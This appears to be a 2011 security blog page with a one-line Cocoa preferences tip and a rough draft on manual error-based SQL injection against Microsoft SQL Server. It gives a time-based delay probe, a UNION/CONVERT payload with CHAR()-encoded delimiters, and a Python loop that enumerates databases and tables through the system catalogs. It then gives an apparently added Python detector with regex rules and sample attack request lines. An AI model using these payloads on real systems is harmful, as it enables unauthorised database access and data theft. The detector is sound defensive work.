OSX IDS
Monday, April 11, 2011
Thursday, April 7, 2011
Clear NSUserDefaults
The following will clear all saved preferences:
[[NSUserDefaults standardUserDefaults] setPersistentDomain:[NSDictionary dictionary] forName:[[NSBundle mainBundle] bundleIdentifier]];
Monday, April 4, 2011
MS-SQL Injection through errors
The following is a very, very rough outline draft; I will fill in the details at a later date:
Sqlmap (also found on BackTrack OS) uses a payload similar to the following to generate MSSQL errors. I've found that at times sqlmap will fail for my needs, so knowing how to perform the injection manually helps.
For example, we know the following form is vulnerable to SQL injection because a time-based payload introduces a measurable delay:
1);WAITFOR DELAY '0:0:9'--
We can proceed with the following injection technique to generate useful information. The following was devised after much testing:
) UNION SELECT 1,2,3,4,5,6,7,8 FROM DATABASE..invoice WHERE 1953=CONVERT(INT,(CHAR(58)+CHAR(108)+CHAR(117)+CHAR(121)+CHAR(58)+("+qryarg+")+CHAR(58)+CHAR(107)+CHAR(106)+CHAR(113)+CHAR(58))) AND (7022=7022)--
We use 8 columns because the (unknown) vulnerable query returns 8 columns, and a UNION must match that column count; the count was determined from the SQL error messages returned by earlier injections. The CHAR() sequences spell the delimiters ":luy:" and ":kjq:" around the result of qryarg; CONVERT(INT, ...) fails on that non-numeric string, and the conversion error message echoes the delimited value back in the response.
We then substitute our qryarg with the query we are interested in.
for i in range(1,500):
    # i-th database name: innermost TOP i ascending, then TOP 1 descending
    qryarg="SELECT TOP 1 name FROM (SELECT TOP "+str(i)+" name FROM master..sysdatabases ORDER BY name ASC) sq ORDER BY name DESC"
Each iteration sends one request that selects the i-th database name from master..sysdatabases, so the loop enumerates the databases one name per request.
Then we start enumerating table names based on the found database names:
SELECT TOP 1 name FROM (SELECT TOP "+ str(i) +" name FROM DATABASE..sysobjects WHERE xtype = 'U' ORDER BY name ASC) sq ORDER BY name DESC
The same approach is then repeated for column names, and finally for the actual row data.
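From the defender's side, the request shapes above are easy to recognise once the CHAR() concatenation is undone. The following is an added example, not code from the original post: a small Python detector that decodes CHAR() chains and flags time-based, UNION-based and error-based CONVERT payloads in constructed web-server request lines (the sample lines, the rule names and the function names are all my own).

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request lines (not taken from the original post); the
# id= parameter carries URL-encoded versions of the payload shapes above.
SAMPLE_LOG = [
    "GET /invoice.asp?id=1 HTTP/1.1",
    "GET /invoice.asp?id=1%29%3BWAITFOR+DELAY+%270%3A0%3A9%27-- HTTP/1.1",
    "GET /invoice.asp?id=1%29+UNION+SELECT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8+FROM+"
    "DATABASE..invoice+WHERE+1953%3DCONVERT%28INT%2C%28CHAR%2858%29%2BCHAR%28108%29"
    "%2BCHAR%28117%29%2BCHAR%28121%29%2BCHAR%2858%29%2B%28SELECT+TOP+1+name+FROM+"
    "master..sysdatabases%29%2BCHAR%2858%29%2BCHAR%28107%29%2BCHAR%28106%29"
    "%2BCHAR%28113%29%2BCHAR%2858%29%29%29+AND+%287022%3D7022%29-- HTTP/1.1",
    "GET /search.asp?q=convert+char+count HTTP/1.1",
]

CHAR_CHAIN = re.compile(r"CHAR\(\d+\)(?:\s*\+\s*CHAR\(\d+\))*", re.I)
CHAR_ONE = re.compile(r"CHAR\((\d+)\)", re.I)

def decode_char_chain(sql):
    """Collapse CHAR(58)+CHAR(108)+... into the literal it spells (e.g. ':luy:'),
    so obfuscated delimiters become visible to the rules below."""
    spell = lambda m: "".join(chr(int(n)) for n in CHAR_ONE.findall(m.group(0)))
    return CHAR_CHAIN.sub(spell, sql)

RULES = [
    ("time-based blind (WAITFOR DELAY)", re.compile(r"\bWAITFOR\s+DELAY\b", re.I)),
    ("union-based column matching", re.compile(r"\bUNION\s+SELECT\b", re.I)),
    ("error-based CONVERT(INT, subquery)",
     re.compile(r"CONVERT\s*\(\s*INT\s*,.*\(\s*SELECT\b", re.I | re.S)),
    ("system catalog access",
     re.compile(r"\b(?:master\.\.sysdatabases|sysobjects)\b", re.I)),
]

def classify(request_line):
    """Return the names of every rule matching one decoded request line."""
    query = request_line.split()[1].partition("?")[2]   # assumes 'METHOD path HTTP/x'
    decoded = decode_char_chain(unquote_plus(query))
    hits = [name for name, rx in RULES if rx.search(decoded)]
    # Short ':xyz:' tags on both sides of a subquery make the leaked error text
    # easy to parse; after CHAR() decoding they are plain literals.
    if re.search(r":[a-z]{3}:.*\(\s*SELECT.*:[a-z]{3}:", decoded, re.I | re.S):
        hits.append("delimited error-extraction markers")
    return hits

def scan(lines):
    """Map each suspicious request line to its findings; clean lines are omitted."""
    return {line: hits for line in lines if (hits := classify(line))}

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_LOG).items():
        print(line[:60], "->", ", ".join(hits))
```

The same decode step is what makes the two-marker pattern detectable at all: a rule written against the raw CHAR() text would need one regex per obfuscation variant.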